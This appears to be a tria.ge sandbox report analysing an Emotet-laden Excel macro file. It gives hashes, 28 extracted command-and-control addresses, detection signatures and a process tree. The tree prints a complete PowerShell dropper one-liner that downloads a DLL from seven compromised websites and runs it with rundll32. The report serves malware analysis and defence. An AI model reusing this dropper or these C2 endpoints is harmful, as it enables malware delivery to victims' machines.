Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
24/11/2021, 17:59
211124-wk8rgsddbm 1022/11/2021, 14:46
211122-r5n6csagd6 1022/11/2021, 14:46
211122-r5csbsfgdp 1022/11/2021, 14:44
211122-r4kfsafgdn 1022/11/2021, 14:41
211122-r2x9vsfgcq 1022/11/2021, 14:20
211122-rneklaffgr 1022/11/2021, 14:15
211122-rkk8zaffgl 1017/11/2021, 06:51
211117-hm1l1aeefm 1017/11/2021, 06:37
211117-hdnk3seedn 10Analysis
-
max time kernel
27s -
max time network
26s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
22/11/2021, 14:44
Static task
static1
General
-
Target
865663204559_17_Nov_2021.xlsm
-
Size
44KB
-
MD5
477fd718bb764ffe3c5afde16c6c8dd2
-
SHA1
eb932e19d95f88d64270d40cdc0b92c6d1cf63be
-
SHA256
ee880ebdf26a1bcebe70a7ba17659199833c6107d758e26d37502bed9a225ee3
-
SHA512
f7d0451ca3670179cc93a680b99f8982204c43054c55eb479c38dc8ea0ba6ba5b6ebea4508569091c07d95a759841455605e6daeab445146b29fc1af377ba267
Malware Config
Extracted
emotet
Epoch4
91.200.186.228:443
191.252.196.221:8080
94.177.248.64:443
66.42.55.5:7080
103.8.26.103:8080
185.184.25.237:8080
103.8.26.102:8080
178.79.147.66:8080
58.227.42.236:80
45.118.135.203:7080
103.75.201.2:443
195.154.133.20:443
45.142.114.231:8080
212.237.5.209:443
207.38.84.195:8080
104.251.214.46:8080
212.237.17.99:8080
212.237.56.116:7080
216.158.226.206:443
110.232.117.186:8080
158.69.222.101:443
107.182.225.142:8080
176.104.106.96:8080
81.0.236.90:443
50.116.54.215:443
138.185.72.26:8080
51.68.175.8:8080
210.57.217.132:8080
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2648 2772 cmd.exe 67 -
suricata: ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)
suricata: ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)
-
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
-
Blocklisted process makes network request 4 IoCs
flow pid Process 15 3504 powershell.exe 23 3504 powershell.exe 35 1584 rundll32.exe 36 1584 rundll32.exe -
Downloads MZ/PE file
-
Loads dropped DLL 2 IoCs
pid Process 652 rundll32.exe 868 rundll32.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\Xckwcvpdfqtsymy\tchlvc.htc rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2772 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 3504 powershell.exe 3504 powershell.exe 3504 powershell.exe 1584 rundll32.exe 1584 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3504 powershell.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
pid Process 2772 EXCEL.EXE 2772 EXCEL.EXE 2772 EXCEL.EXE 2772 EXCEL.EXE 2772 EXCEL.EXE 2772 EXCEL.EXE 2772 EXCEL.EXE 2772 EXCEL.EXE 2772 EXCEL.EXE 2772 EXCEL.EXE 2772 EXCEL.EXE 2772 EXCEL.EXE 2772 EXCEL.EXE -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 2772 wrote to memory of 2648 2772 EXCEL.EXE 70 PID 2772 wrote to memory of 2648 2772 EXCEL.EXE 70 PID 2648 wrote to memory of 3504 2648 cmd.exe 72 PID 2648 wrote to memory of 3504 2648 cmd.exe 72 PID 3504 wrote to memory of 652 3504 powershell.exe 74 PID 3504 wrote to memory of 652 3504 powershell.exe 74 PID 3504 wrote to memory of 652 3504 powershell.exe 74 PID 652 wrote to memory of 868 652 rundll32.exe 75 PID 652 wrote to memory of 868 652 rundll32.exe 75 PID 652 wrote to memory of 868 652 rundll32.exe 75 PID 868 wrote to memory of 1636 868 rundll32.exe 76 PID 868 wrote to memory of 1636 868 rundll32.exe 76 PID 868 wrote to memory of 1636 868 rundll32.exe 76 PID 1636 wrote to memory of 1584 1636 rundll32.exe 77 PID 1636 wrote to memory of 1584 1636 rundll32.exe 77 PID 1636 wrote to memory of 1584 1636 rundll32.exe 77
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\865663204559_17_Nov_2021.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3504 -
C:\Windows\SysWow64\rundll32.exe"C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\240041168.dll,f12280915264⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:652 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\240041168.dll",Control_RunDLL5⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:868 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xckwcvpdfqtsymy\tchlvc.htc",LpFnwazG6⤵
- Suspicious use of WriteProcessMemory
PID:1636 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Xckwcvpdfqtsymy\tchlvc.htc",Control_RunDLL7⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:1584
-
-
-
-
-
-